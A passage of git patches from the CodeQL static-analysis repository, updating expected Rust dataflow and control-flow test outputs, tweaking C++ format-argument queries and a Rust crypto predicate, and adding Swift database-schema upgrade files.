TryExpr | test.rs:292:5:294:5 | exit fn test_question_mark_operator_1 (normal) | return | | test.rs:293:12:293:28 | TryExpr | test.rs:293:32:293:32 | 4 | match | | test.rs:293:12:293:32 | ... + ... | test.rs:293:9:293:33 | Ok(...) | | diff --git a/rust/ql/test/library-tests/dataflow/global/inline-flow.expected b/rust/ql/test/library-tests/dataflow/global/inline-flow.expected index 89fa0442293..406b84d68cd 100644 --- a/rust/ql/test/library-tests/dataflow/global/inline-flow.expected +++ b/rust/ql/test/library-tests/dataflow/global/inline-flow.expected @@ -16,16 +16,16 @@ edges | main.rs:41:26:44:5 | { ... } | main.rs:41:13:44:6 | pass_through(...) | provenance | | | main.rs:43:9:43:18 | source(...) | main.rs:41:26:44:5 | { ... } | provenance | | | main.rs:56:23:56:28 | ...: i64 | main.rs:57:14:57:14 | n | provenance | | -| main.rs:59:31:65:5 | { ... } | main.rs:77:13:77:25 | ... .get_data(...) | provenance | | +| main.rs:59:31:65:5 | { ... } | main.rs:77:13:77:25 | mn.get_data(...) | provenance | | | main.rs:63:13:63:21 | source(...) | main.rs:59:31:65:5 | { ... } | provenance | | | main.rs:66:28:66:33 | ...: i64 | main.rs:66:43:72:5 | { ... } | provenance | | -| main.rs:77:13:77:25 | ... .get_data(...) | main.rs:78:10:78:10 | a | provenance | | +| main.rs:77:13:77:25 | mn.get_data(...) | main.rs:78:10:78:10 | a | provenance | | | main.rs:83:13:83:21 | source(...) | main.rs:84:16:84:16 | a | provenance | | | main.rs:84:16:84:16 | a | main.rs:56:23:56:28 | ...: i64 | provenance | | | main.rs:89:13:89:21 | source(...) | main.rs:90:29:90:29 | a | provenance | | -| main.rs:90:13:90:30 | ... .data_through(...) | main.rs:91:10:91:10 | b | provenance | | +| main.rs:90:13:90:30 | mn.data_through(...) | main.rs:91:10:91:10 | b | provenance | | | main.rs:90:29:90:29 | a | main.rs:66:28:66:33 | ...: i64 | provenance | | -| main.rs:90:29:90:29 | a | main.rs:90:13:90:30 | ... .data_through(...) | provenance | | +| main.rs:90:29:90:29 | a | main.rs:90:13:90:30 | mn.data_through(...) | provenance | | nodes | main.rs:12:28:14:1 | { ... } | semmle.label | { ... } | | main.rs:13:5:13:13 | source(...) | semmle.label | source(...) | @@ -51,18 +51,18 @@ nodes | main.rs:63:13:63:21 | source(...) | semmle.label | source(...) | | main.rs:66:28:66:33 | ...: i64 | semmle.label | ...: i64 | | main.rs:66:43:72:5 | { ... } | semmle.label | { ... } | -| main.rs:77:13:77:25 | ... .get_data(...) | semmle.label | ... .get_data(...) | +| main.rs:77:13:77:25 | mn.get_data(...) | semmle.label | mn.get_data(...) | | main.rs:78:10:78:10 | a | semmle.label | a | | main.rs:83:13:83:21 | source(...) | semmle.label | source(...) | | main.rs:84:16:84:16 | a | semmle.label | a | | main.rs:89:13:89:21 | source(...) | semmle.label | source(...) | -| main.rs:90:13:90:30 | ... .data_through(...) | semmle.label | ... .data_through(...) | +| main.rs:90:13:90:30 | mn.data_through(...) | semmle.label | mn.data_through(...) | | main.rs:90:29:90:29 | a | semmle.label | a | | main.rs:91:10:91:10 | b | semmle.label | b | subpaths | main.rs:36:26:36:26 | a | main.rs:30:17:30:22 | ...: i64 | main.rs:30:32:32:1 | { ... } | main.rs:36:13:36:27 | pass_through(...) | | main.rs:41:26:44:5 | { ... } | main.rs:30:17:30:22 | ...: i64 | main.rs:30:32:32:1 | { ... } | main.rs:41:13:44:6 | pass_through(...) | -| main.rs:90:29:90:29 | a | main.rs:66:28:66:33 | ...: i64 | main.rs:66:43:72:5 | { ... } | main.rs:90:13:90:30 | ... .data_through(...) | +| main.rs:90:29:90:29 | a | main.rs:66:28:66:33 | ...: i64 | main.rs:66:43:72:5 | { ... } | main.rs:90:13:90:30 | mn.data_through(...) | testFailures #select | main.rs:18:10:18:10 | a | main.rs:13:5:13:13 | source(...) | main.rs:18:10:18:10 | a | $@ | main.rs:13:5:13:13 | source(...) | source(...) | diff --git a/rust/ql/test/library-tests/dataflow/global/viableCallable.expected b/rust/ql/test/library-tests/dataflow/global/viableCallable.expected index eaf4a7b14d9..9bbde202217 100644 --- a/rust/ql/test/library-tests/dataflow/global/viableCallable.expected +++ b/rust/ql/test/library-tests/dataflow/global/viableCallable.expected @@ -12,12 +12,12 @@ | main.rs:45:5:45:11 | sink(...) | main.rs:5:1:7:1 | fn sink | | main.rs:57:9:57:15 | sink(...) | main.rs:5:1:7:1 | fn sink | | main.rs:63:13:63:21 | source(...) | main.rs:1:1:3:1 | fn source | -| main.rs:77:13:77:25 | ... .get_data(...) | main.rs:59:5:65:5 | fn get_data | +| main.rs:77:13:77:25 | mn.get_data(...) | main.rs:59:5:65:5 | fn get_data | | main.rs:78:5:78:11 | sink(...) | main.rs:5:1:7:1 | fn sink | | main.rs:83:13:83:21 | source(...) | main.rs:1:1:3:1 | fn source | -| main.rs:84:5:84:17 | ... .data_in(...) | main.rs:56:5:58:5 | fn data_in | +| main.rs:84:5:84:17 | mn.data_in(...) | main.rs:56:5:58:5 | fn data_in | | main.rs:89:13:89:21 | source(...) | main.rs:1:1:3:1 | fn source | -| main.rs:90:13:90:30 | ... .data_through(...) | main.rs:66:5:72:5 | fn data_through | +| main.rs:90:13:90:30 | mn.data_through(...) | main.rs:66:5:72:5 | fn data_through | | main.rs:91:5:91:11 | sink(...) | main.rs:5:1:7:1 | fn sink | | main.rs:95:5:95:22 | data_out_of_call(...) | main.rs:16:1:19:1 | fn data_out_of_call | | main.rs:96:5:96:21 | data_in_to_call(...) | main.rs:25:1:28:1 | fn data_in_to_call | diff --git a/rust/ql/test/library-tests/dataflow/local/inline-flow.expected b/rust/ql/test/library-tests/dataflow/local/inline-flow.expected index 5a8548771bc..9ee2f23f08c 100644 --- a/rust/ql/test/library-tests/dataflow/local/inline-flow.expected +++ b/rust/ql/test/library-tests/dataflow/local/inline-flow.expected @@ -35,7 +35,7 @@ edges | main.rs:214:14:214:14 | n | main.rs:214:25:214:25 | n | provenance | | | main.rs:224:14:224:29 | Some(...) [Some] | main.rs:225:10:225:11 | s1 [Some] | provenance | | | main.rs:224:19:224:28 | source(...) | main.rs:224:14:224:29 | Some(...) [Some] | provenance | | -| main.rs:225:10:225:11 | s1 [Some] | main.rs:225:10:225:20 | ... .unwrap(...) | provenance | | +| main.rs:225:10:225:11 | s1 [Some] | main.rs:225:10:225:20 | s1.unwrap(...) | provenance | | | main.rs:229:14:229:29 | Some(...) [Some] | main.rs:231:14:231:15 | s1 [Some] | provenance | | | main.rs:229:19:229:28 | source(...) | main.rs:229:14:229:29 | Some(...) [Some] | provenance | | | main.rs:231:14:231:15 | s1 [Some] | main.rs:231:14:231:16 | TryExpr | provenance | | @@ -158,7 +158,7 @@ nodes | main.rs:224:14:224:29 | Some(...) [Some] | semmle.label | Some(...) [Some] | | main.rs:224:19:224:28 | source(...) | semmle.label | source(...) | | main.rs:225:10:225:11 | s1 [Some] | semmle.label | s1 [Some] | -| main.rs:225:10:225:20 | ... .unwrap(...) | semmle.label | ... .unwrap(...) | +| main.rs:225:10:225:20 | s1.unwrap(...) | semmle.label | s1.unwrap(...) | | main.rs:229:14:229:29 | Some(...) [Some] | semmle.label | Some(...) [Some] | | main.rs:229:19:229:28 | source(...) | semmle.label | source(...) | | main.rs:231:14:231:15 | s1 [Some] | semmle.label | s1 [Some] | @@ -262,7 +262,7 @@ testFailures | main.rs:152:10:152:10 | a | main.rs:148:12:148:21 | source(...) | main.rs:152:10:152:10 | a | $@ | main.rs:148:12:148:21 | source(...) | source(...) | | main.rs:201:33:201:33 | n | main.rs:198:27:198:36 | source(...) | main.rs:201:33:201:33 | n | $@ | main.rs:198:27:198:36 | source(...) | source(...) | | main.rs:214:25:214:25 | n | main.rs:211:19:211:28 | source(...) | main.rs:214:25:214:25 | n | $@ | main.rs:211:19:211:28 | source(...) | source(...) | -| main.rs:225:10:225:20 | ... .unwrap(...) | main.rs:224:19:224:28 | source(...) | main.rs:225:10:225:20 | ... .unwrap(...) | $@ | main.rs:224:19:224:28 | source(...) | source(...) | +| main.rs:225:10:225:20 | s1.unwrap(...) | main.rs:224:19:224:28 | source(...) | main.rs:225:10:225:20 | s1.unwrap(...) | $@ | main.rs:224:19:224:28 | source(...) | source(...) | | main.rs:232:10:232:11 | i1 | main.rs:229:19:229:28 | source(...) | main.rs:232:10:232:11 | i1 | $@ | main.rs:229:19:229:28 | source(...) | source(...) | | main.rs:243:10:243:11 | i1 | main.rs:238:35:238:44 | source(...) | main.rs:243:10:243:11 | i1 | $@ | main.rs:238:35:238:44 | source(...) | source(...) | | main.rs:259:35:259:35 | n | main.rs:256:29:256:38 | source(...) | main.rs:259:35:259:35 | n | $@ | main.rs:256:29:256:38 | source(...) | source(...) | diff --git a/rust/ql/test/library-tests/variables/Cfg.expected b/rust/ql/test/library-tests/variables/Cfg.expected index a19ebe7a4b3..673f57d5e68 100644 --- a/rust/ql/test/library-tests/variables/Cfg.expected +++ b/rust/ql/test/library-tests/variables/Cfg.expected @@ -945,9 +945,9 @@ edges | variables.rs:428:24:430:5 | exit \|...\| ... (normal) | variables.rs:428:24:430:5 | exit \|...\| ... | | | variables.rs:428:27:430:5 | { ... } | variables.rs:428:24:430:5 | exit \|...\| ... (normal) | | | variables.rs:429:9:429:9 | z | variables.rs:429:22:429:22 | 1 | | -| variables.rs:429:9:429:23 | ... .add_assign(...) | variables.rs:428:27:430:5 | { ... } | | +| variables.rs:429:9:429:23 | z.add_assign(...) | variables.rs:428:27:430:5 | { ... } | | | variables.rs:429:9:429:24 | ExprStmt | variables.rs:429:9:429:9 | z | | -| variables.rs:429:22:429:22 | 1 | variables.rs:429:9:429:23 | ... .add_assign(...) | | +| variables.rs:429:22:429:22 | 1 | variables.rs:429:9:429:23 | z.add_assign(...) | | | variables.rs:431:5:431:12 | closure3 | variables.rs:431:5:431:14 | closure3(...) | | | variables.rs:431:5:431:14 | closure3(...) | variables.rs:432:5:432:17 | ExprStmt | | | variables.rs:431:5:431:15 | ExprStmt | variables.rs:431:5:431:12 | closure3 | | @@ -1094,8 +1094,8 @@ edges | variables.rs:493:5:493:13 | print_i64 | variables.rs:493:15:493:15 | a | | | variables.rs:493:5:493:25 | print_i64(...) | variables.rs:494:5:494:14 | ExprStmt | | | variables.rs:493:5:493:26 | ExprStmt | variables.rs:493:5:493:13 | print_i64 | | -| variables.rs:493:15:493:15 | a | variables.rs:493:15:493:24 | ... .my_get(...) | | -| variables.rs:493:15:493:24 | ... .my_get(...) | variables.rs:493:5:493:25 | print_i64(...) | | +| variables.rs:493:15:493:15 | a | variables.rs:493:15:493:24 | a.my_get(...) | | +| variables.rs:493:15:493:24 | a.my_get(...) | variables.rs:493:5:493:25 | print_i64(...) | | | variables.rs:494:5:494:5 | a | variables.rs:494:5:494:9 | a.val | | | variables.rs:494:5:494:9 | a.val | variables.rs:494:13:494:13 | 5 | | | variables.rs:494:5:494:13 | ... = ... | variables.rs:495:5:495:26 | ExprStmt | | @@ -1104,8 +1104,8 @@ edges | variables.rs:495:5:495:13 | print_i64 | variables.rs:495:15:495:15 | a | | | variables.rs:495:5:495:25 | print_i64(...) | variables.rs:496:5:496:28 | ExprStmt | | | variables.rs:495:5:495:26 | ExprStmt | variables.rs:495:5:495:13 | print_i64 | | -| variables.rs:495:15:495:15 | a | variables.rs:495:15:495:24 | ... .my_get(...) | | -| variables.rs:495:15:495:24 | ... .my_get(...) | variables.rs:495:5:495:25 | print_i64(...) | | +| variables.rs:495:15:495:15 | a | variables.rs:495:15:495:24 | a.my_get(...) | | +| variables.rs:495:15:495:24 | a.my_get(...) | variables.rs:495:5:495:25 | print_i64(...) | | | variables.rs:496:5:496:5 | a | variables.rs:496:25:496:25 | 2 | | | variables.rs:496:5:496:27 | ... = ... | variables.rs:497:5:497:26 | ExprStmt | | | variables.rs:496:5:496:28 | ExprStmt | variables.rs:496:5:496:5 | a | | @@ -1114,8 +1114,8 @@ edges | variables.rs:497:5:497:13 | print_i64 | variables.rs:497:15:497:15 | a | | | variables.rs:497:5:497:25 | print_i64(...) | variables.rs:491:14:498:1 | { ... } | | | variables.rs:497:5:497:26 | ExprStmt | variables.rs:497:5:497:13 | print_i64 | | -| variables.rs:497:15:497:15 | a | variables.rs:497:15:497:24 | ... .my_get(...) | | -| variables.rs:497:15:497:24 | ... .my_get(...) | variables.rs:497:5:497:25 | print_i64(...) | | +| variables.rs:497:15:497:15 | a | variables.rs:497:15:497:24 | a.my_get(...) | | +| variables.rs:497:15:497:24 | a.my_get(...) | variables.rs:497:5:497:25 | print_i64(...) | | | variables.rs:500:1:507:1 | enter fn arrays | variables.rs:501:5:501:26 | let ... = ... | | | variables.rs:500:1:507:1 | exit fn arrays (normal) | variables.rs:500:1:507:1 | exit fn arrays | | | variables.rs:500:13:507:1 | { ... } | variables.rs:500:1:507:1 | exit fn arrays (normal) | | @@ -1197,8 +1197,8 @@ edges | variables.rs:529:7:529:11 | a | variables.rs:530:3:530:10 | ExprStmt | match | | variables.rs:529:15:529:33 | MyStruct {...} | variables.rs:529:7:529:11 | a | | | variables.rs:529:31:529:31 | 1 | variables.rs:529:15:529:33 | MyStruct {...} | | -| variables.rs:530:3:530:3 | a | variables.rs:530:3:530:9 | ... .bar(...) | | -| variables.rs:530:3:530:9 | ... .bar(...) | variables.rs:532:3:532:19 | ExprStmt | | +| variables.rs:530:3:530:3 | a | variables.rs:530:3:530:9 | a.bar(...) | | +| variables.rs:530:3:530:9 | a.bar(...) | variables.rs:532:3:532:19 | ExprStmt | | | variables.rs:530:3:530:10 | ExprStmt | variables.rs:530:3:530:3 | a | | | variables.rs:532:3:532:11 | print_i64 | variables.rs:532:13:532:13 | a | | | variables.rs:532:3:532:18 | print_i64(...) | variables.rs:528:30:533:1 | { ... } | | From 2da3d3609273acfd45f4e43febdd63a247ec7b2b Mon Sep 17 00:00:00 2001 From: Calum Grant Date: Thu, 5 Dec 2024 15:31:37 +0000 Subject: [PATCH 0858/1267] C++: Change note --- .../change-notes/2024-12-05-wrong-number-format-arguments.md | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 cpp/ql/src/change-notes/2024-12-05-wrong-number-format-arguments.md diff --git a/cpp/ql/src/change-notes/2024-12-05-wrong-number-format-arguments.md b/cpp/ql/src/change-notes/2024-12-05-wrong-number-format-arguments.md new file mode 100644 index 00000000000..abae2dfaa3d --- /dev/null +++ b/cpp/ql/src/change-notes/2024-12-05-wrong-number-format-arguments.md @@ -0,0 +1,4 @@ +--- +category: minorAnalysis +--- +* The "Too few arguments to formatting function" query (`cpp/wrong-number-format-arguments`) query no longer produces results if an argument has an extraction error. From 129f21af2988531249ceb22304e93fe34b4836f5 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 6 Dec 2024 09:37:41 +0000 Subject: [PATCH 0859/1267] Rust: Make a predicate private. --- rust/ql/lib/codeql/rust/frameworks/RustCrypto.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rust/ql/lib/codeql/rust/frameworks/RustCrypto.qll b/rust/ql/lib/codeql/rust/frameworks/RustCrypto.qll index 1037c95b436..d88a276091c 100644 --- a/rust/ql/lib/codeql/rust/frameworks/RustCrypto.qll +++ b/rust/ql/lib/codeql/rust/frameworks/RustCrypto.qll @@ -7,7 +7,7 @@ private import codeql.rust.Concepts private import codeql.rust.dataflow.DataFlow bindingset[algorithmName] -string simplifyAlgorithmName(string algorithmName) { +private string simplifyAlgorithmName(string algorithmName) { // the cipher library gives triple-DES names like "TdesEee2" and "TdesEde2" if algorithmName.matches("Tdes%") then result = "3des" else result = algorithmName } From 2cd4e1af9f387b6dbbe3b0a802104ae494aa70c6 Mon Sep 17 00:00:00 2001 From: Calum Grant Date: Fri, 6 Dec 2024 09:55:05 +0000 Subject: [PATCH 0860/1267] C++: Use Expr.stripType() --- cpp/ql/src/Likely Bugs/Format/WrongTypeFormatArguments.ql | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/cpp/ql/src/Likely Bugs/Format/WrongTypeFormatArguments.ql b/cpp/ql/src/Likely Bugs/Format/WrongTypeFormatArguments.ql index 905c4307ad1..272ef8369d0 100644 --- a/cpp/ql/src/Likely Bugs/Format/WrongTypeFormatArguments.ql +++ b/cpp/ql/src/Likely Bugs/Format/WrongTypeFormatArguments.ql @@ -170,11 +170,7 @@ where ) and not arg.isAffectedByMacro() and not arg.isFromUninstantiatedTemplate(_) and - not actual.getUnspecifiedType() instanceof ErroneousType and - not ( - expected instanceof PointerType and - actual.getUnspecifiedType().(PointerType).getBaseType() instanceof ErroneousType - ) and + not actual.stripType() instanceof ErroneousType and not arg.(Call).mayBeFromImplicitlyDeclaredFunction() select arg, "This format specifier for type '" + expected.getName() + "' does not match the argument type '" + From 7ee3bf9fc88c9d71f5f39d59613056d78453fcd7 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Fri, 6 Dec 2024 12:35:01 +0100 Subject: [PATCH 0861/1267] Swift: add update/downgrade scripts --- .../old.dbscheme | 2793 +++++++++++++++++ .../swift.dbscheme | 2786 ++++++++++++++++ .../upgrade.properties | 4 + .../old.dbscheme | 2786 ++++++++++++++++ .../swift.dbscheme | 2793 +++++++++++++++++ .../upgrade.properties | 2 + 6 files changed, 11164 insertions(+) create mode 100644 swift/downgrades/33db81ad4b606ff9a476c8dabeb9fffbf61aa829/old.dbscheme create mode 100644 swift/downgrades/33db81ad4b606ff9a476c8dabeb9fffbf61aa829/swift.dbscheme create mode 100644 swift/downgrades/33db81ad4b606ff9a476c8dabeb9fffbf61aa829/upgrade.properties create mode 100644 swift/ql/lib/upgrades/44c4818a8987b5e1b3cd11e553e41045e1262451/old.dbscheme create mode 100644 swift/ql/lib/upgrades/44c4818a8987b5e1b3cd11e553e41045e1262451/swift.dbscheme create mode 100644 swift/ql/lib/upgrades/44c4818a8987b5e1b3cd11e553e41045e1262451/upgrade.properties diff --git a/swift/downgrades/33db81ad4b606ff9a476c8dabeb9fffbf61aa829/old.dbscheme b/swift/downgrades/33db81ad4b606ff9a476c8dabeb9fffbf61aa829/old.dbscheme new file mode 100644 index 00000000000..33db81ad4b6 --- /dev/null +++ b/swift/downgrades/33db81ad4b606ff9a476c8dabeb9fffbf61aa829/old.dbscheme @@ -0,0 +1,2793 @@ +// generated by codegen/codegen.py, do not edit + +// from prefix.dbscheme +/** + * The source location of the snapshot. + */ +sourceLocationPrefix( + string prefix: string ref +); + + +// from schema.py + +@element = + @file +| @generic_context +| @locatable +| @location +| @type +; + +#keyset[id] +element_is_unknown( + int id: @element ref +); + +@file = + @db_file +; + +#keyset[id] +files( + int id: @file ref, + string name: string ref +); + +#keyset[id] +file_is_successfully_extracted( + int id: @file ref +); + +@locatable = + @argument +| @ast_node +| @comment +| @diagnostics +| @error_element +; + +#keyset[id] +locatable_locations( + int id: @locatable ref, + int location: @location_or_none ref +); + +@location = + @db_location +; + +#keyset[id] +locations( + int id: @location ref, + int file: @file_or_none ref, + int start_line: int ref, + int start_column: int ref, + int end_line: int ref, + int end_column: int ref +); + +@ast_node = + @availability_info +| @availability_spec +| @callable +| @case_label_item +| @condition_element +| @decl +| @expr +| @key_path_component +| @macro_role +| @pattern +| @stmt +| @stmt_condition +| @type_repr +; + +comments( + unique int id: @comment, + string text: string ref +); + +db_files( + unique int id: @db_file +); + +db_locations( + unique int id: @db_location +); + +diagnostics( + unique int id: @diagnostics, + string text: string ref, + int kind: int ref +); + +@error_element = + @error_expr +| @error_type +| @overloaded_decl_ref_expr +| @unresolved_decl_ref_expr +| @unresolved_dot_expr +| @unresolved_member_chain_result_expr +| @unresolved_member_expr +| @unresolved_pattern_expr +| @unresolved_specialize_expr +| @unresolved_type +| @unresolved_type_conversion_expr +| @unspecified_element +; + +availability_infos( + unique int id: @availability_info +); + +#keyset[id] +availability_info_is_unavailable( + int id: @availability_info ref +); + +#keyset[id, index] +availability_info_specs( + int id: @availability_info ref, + int index: int ref, + int spec: @availability_spec_or_none ref +); + +@availability_spec = + @other_availability_spec +| @platform_version_availability_spec +; + +@callable = + @closure_expr +| @function +; + +#keyset[id] +callable_names( + int id: @callable ref, + string name: string ref +); + +#keyset[id] +callable_self_params( + int id: @callable ref, + int self_param: @param_decl_or_none ref +); + +#keyset[id, index] +callable_params( + int id: @callable ref, + int index: int ref, + int param: @param_decl_or_none ref +); + +#keyset[id] +callable_bodies( + int id: @callable ref, + int body: @brace_stmt_or_none ref +); + +#keyset[id, index] +callable_captures( + int id: @callable ref, + int index: int ref, + int capture: @captured_decl_or_none ref +); + +key_path_components( + unique int id: @key_path_component, + int kind: int ref, + int component_type: @type_or_none ref +); + +#keyset[id, index] +key_path_component_subscript_arguments( + int id: @key_path_component ref, + int index: int ref, + int subscript_argument: @argument_or_none ref +); + +#keyset[id] +key_path_component_tuple_indices( + int id: @key_path_component ref, + int tuple_index: int ref +); + +#keyset[id] +key_path_component_decl_refs( + int id: @key_path_component ref, + int decl_ref: @value_decl_or_none ref +); + +macro_roles( + unique int id: @macro_role, + int kind: int ref, + int macro_syntax: int ref +); + +#keyset[id, index] +macro_role_conformances( + int id: @macro_role ref, + int index: int ref, + int conformance: @type_expr_or_none ref +); + +#keyset[id, index] +macro_role_names( + int id: @macro_role ref, + int index: int ref, + string name: string ref +); + +unspecified_elements( + unique int id: @unspecified_element, + string property: string ref, + string error: string ref +); + +#keyset[id] +unspecified_element_parents( + int id: @unspecified_element ref, + int parent: @element ref +); + +#keyset[id] +unspecified_element_indices( + int id: @unspecified_element ref, + int index: int ref +); + +#keyset[id, index] +unspecified_element_children( + int id: @unspecified_element ref, + int index: int ref, + int child: @ast_node_or_none ref +); + +other_availability_specs( + unique int id: @other_availability_spec +); + +platform_version_availability_specs( + unique int id: @platform_version_availability_spec, + string platform: string ref, + string version: string ref +); + +@decl = + @captured_decl +| @enum_case_decl +| @extension_decl +| @if_config_decl +| @import_decl +| @missing_member_decl +| @operator_decl +| @pattern_binding_decl +| @pound_diagnostic_decl +| @precedence_group_decl +| @top_level_code_decl +| @value_decl +; + +#keyset[id] +decls( //dir=decl + int id: @decl ref, + int module: @module_decl_or_none ref +); + +#keyset[id, index] +decl_members( //dir=decl + int id: @decl ref, + int index: int ref, + int member: @decl_or_none ref +); + +@generic_context = + @extension_decl +| @function +| @generic_type_decl +| @macro_decl +| @subscript_decl +; + +#keyset[id, index] +generic_context_generic_type_params( //dir=decl + int id: @generic_context ref, + int index: int ref, + int generic_type_param: @generic_type_param_decl_or_none ref +); + +captured_decls( //dir=decl + unique int id: @captured_decl, + int decl: @value_decl_or_none ref +); + +#keyset[id] +captured_decl_is_direct( //dir=decl + int id: @captured_decl ref +); + +#keyset[id] +captured_decl_is_escaping( //dir=decl + int id: @captured_decl ref +); + +enum_case_decls( //dir=decl + unique int id: @enum_case_decl +); + +#keyset[id, index] +enum_case_decl_elements( //dir=decl + int id: @enum_case_decl ref, + int index: int ref, + int element: @enum_element_decl_or_none ref +); + +extension_decls( //dir=decl + unique int id: @extension_decl, + int extended_type_decl: @nominal_type_decl_or_none ref +); + +#keyset[id, index] +extension_decl_protocols( //dir=decl + int id: @extension_decl ref, + int index: int ref, + int protocol: @protocol_decl_or_none ref +); + +if_config_decls( //dir=decl + unique int id: @if_config_decl +); + +#keyset[id, index] +if_config_decl_active_elements( //dir=decl + int id: @if_config_decl ref, + int index: int ref, + int active_element: @ast_node_or_none ref +); + +import_decls( //dir=decl + unique int id: @import_decl +); + +#keyset[id] +import_decl_is_exported( //dir=decl + int id: @import_decl ref +); + +#keyset[id] +import_decl_imported_modules( //dir=decl + int id: @import_decl ref, + int imported_module: @module_decl_or_none ref +); + +#keyset[id, index] +import_decl_declarations( //dir=decl + int id: @import_decl ref, + int index: int ref, + int declaration: @value_decl_or_none ref +); + +missing_member_decls( //dir=decl + unique int id: @missing_member_decl, + string name: string ref +); + +@operator_decl = + @infix_operator_decl +| @postfix_operator_decl +| @prefix_operator_decl +; + +#keyset[id] +operator_decls( //dir=decl + int id: @operator_decl ref, + string name: string ref +); + +pattern_binding_decls( //dir=decl + unique int id: @pattern_binding_decl +); + +#keyset[id, index] +pattern_binding_decl_inits( //dir=decl + int id: @pattern_binding_decl ref, + int index: int ref, + int init: @expr_or_none ref +); + +#keyset[id, index] +pattern_binding_decl_patterns( //dir=decl + int id: @pattern_binding_decl ref, + int index: int ref, + int pattern: @pattern_or_none ref +); + +pound_diagnostic_decls( //dir=decl + unique int id: @pound_diagnostic_decl, + int kind: int ref, + int message: @string_literal_expr_or_none ref +); + +precedence_group_decls( //dir=decl + unique int id: @precedence_group_decl +); + +top_level_code_decls( //dir=decl + unique int id: @top_level_code_decl, + int body: @brace_stmt_or_none ref +); + +@value_decl = + @abstract_storage_decl +| @enum_element_decl +| @function +| @macro_decl +| @type_decl +; + +#keyset[id] +value_decls( //dir=decl + int id: @value_decl ref, + int interface_type: @type_or_none ref +); + +@abstract_storage_decl = + @subscript_decl +| @var_decl +; + +#keyset[id, index] +abstract_storage_decl_accessors( //dir=decl + int id: @abstract_storage_decl ref, + int index: int ref, + int accessor: @accessor_or_none ref +); + +enum_element_decls( //dir=decl + unique int id: @enum_element_decl, + string name: string ref +); + +#keyset[id, index] +enum_element_decl_params( //dir=decl + int id: @enum_element_decl ref, + int index: int ref, + int param: @param_decl_or_none ref +); + +@function = + @accessor_or_named_function +| @deinitializer +| @initializer +; + +infix_operator_decls( //dir=decl + unique int id: @infix_operator_decl +); + +#keyset[id] +infix_operator_decl_precedence_groups( //dir=decl + int id: @infix_operator_decl ref, + int precedence_group: @precedence_group_decl_or_none ref +); + +macro_decls( //dir=decl + unique int id: @macro_decl, + string name: string ref +); + +#keyset[id, index] +macro_decl_parameters( //dir=decl + int id: @macro_decl ref, + int index: int ref, + int parameter: @param_decl_or_none ref +); + +#keyset[id, index] +macro_decl_roles( //dir=decl + int id: @macro_decl ref, + int index: int ref, + int role: @macro_role_or_none ref +); + +postfix_operator_decls( //dir=decl + unique int id: @postfix_operator_decl +); + +prefix_operator_decls( //dir=decl + unique int id: @prefix_operator_decl +); + +@type_decl = + @abstract_type_param_decl +| @generic_type_decl +| @module_decl +; + +#keyset[id] +type_decls( //dir=decl + int id: @type_decl ref, + string name: string ref +); + +#keyset[id, index] +type_decl_inherited_types( //dir=decl + int id: @type_decl ref, + int index: int ref, + int inherited_type: @type_or_none ref +); + +@abstract_type_param_decl = + @associated_type_decl +| @generic_type_param_decl +; + +@accessor_or_named_function = + @accessor +| @named_function +; + +deinitializers( //dir=decl + unique int id: @deinitializer +); + +@generic_type_decl = + @nominal_type_decl +| @opaque_type_decl +| @type_alias_decl +; + +initializers( //dir=decl + unique int id: @initializer +); + +module_decls( //dir=decl + unique int id: @module_decl +); + +#keyset[id] +module_decl_is_builtin_module( //dir=decl + int id: @module_decl ref +); + +#keyset[id] +module_decl_is_system_module( //dir=decl + int id: @module_decl ref +); + +module_decl_imported_modules( //dir=decl + int id: @module_decl ref, + int imported_module: @module_decl_or_none ref +); + +module_decl_exported_modules( //dir=decl + int id: @module_decl ref, + int exported_module: @module_decl_or_none ref +); + +subscript_decls( //dir=decl + unique int id: @subscript_decl, + int element_type: @type_or_none ref +); + +#keyset[id, index] +subscript_decl_params( //dir=decl + int id: @subscript_decl ref, + int index: int ref, + int param: @param_decl_or_none ref +); + +@var_decl = + @concrete_var_decl +| @param_decl +; + +#keyset[id] +var_decls( //dir=decl + int id: @var_decl ref, + string name: string ref, + int type_: @type_or_none ref +); + +#keyset[id] +var_decl_attached_property_wrapper_types( //dir=decl + int id: @var_decl ref, + int attached_property_wrapper_type: @type_or_none ref +); + +#keyset[id] +var_decl_parent_patterns( //dir=decl + int id: @var_decl ref, + int parent_pattern: @pattern_or_none ref +); + +#keyset[id] +var_decl_parent_initializers( //dir=decl + int id: @var_decl ref, + int parent_initializer: @expr_or_none ref +); + +#keyset[id] +var_decl_property_wrapper_backing_var_bindings( //dir=decl + int id: @var_decl ref, + int property_wrapper_backing_var_binding: @pattern_binding_decl_or_none ref +); + +#keyset[id] +var_decl_property_wrapper_backing_vars( //dir=decl + int id: @var_decl ref, + int property_wrapper_backing_var: @var_decl_or_none ref +); + +#keyset[id] +var_decl_property_wrapper_projection_var_bindings( //dir=decl + int id: @var_decl ref, + int property_wrapper_projection_var_binding: @pattern_binding_decl_or_none ref +); + +#keyset[id] +var_decl_property_wrapper_projection_vars( //dir=decl + int id: @var_decl ref, + int property_wrapper_projection_var: @var_decl_or_none ref +); + +accessors( //dir=decl + unique int id: @accessor +); + +#keyset[id] +accessor_is_getter( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_setter( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_will_set( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_did_set( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_read( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_modify( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_unsafe_address( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_unsafe_mutable_address( //dir=decl + int id: @accessor ref +); + +associated_type_decls( //dir=decl + unique int id: @associated_type_decl +); + +concrete_var_decls( //dir=decl + unique int id: @concrete_var_decl, + int introducer_int: int ref +); + +generic_type_param_decls( //dir=decl + unique int id: @generic_type_param_decl +); + +named_functions( //dir=decl + unique int id: @named_function +); + +@nominal_type_decl = + @class_decl +| @enum_decl +| @protocol_decl +| @struct_decl +; + +#keyset[id] +nominal_type_decls( //dir=decl + int id: @nominal_type_decl ref, + int type_: @type_or_none ref +); + +opaque_type_decls( //dir=decl + unique int id: @opaque_type_decl, 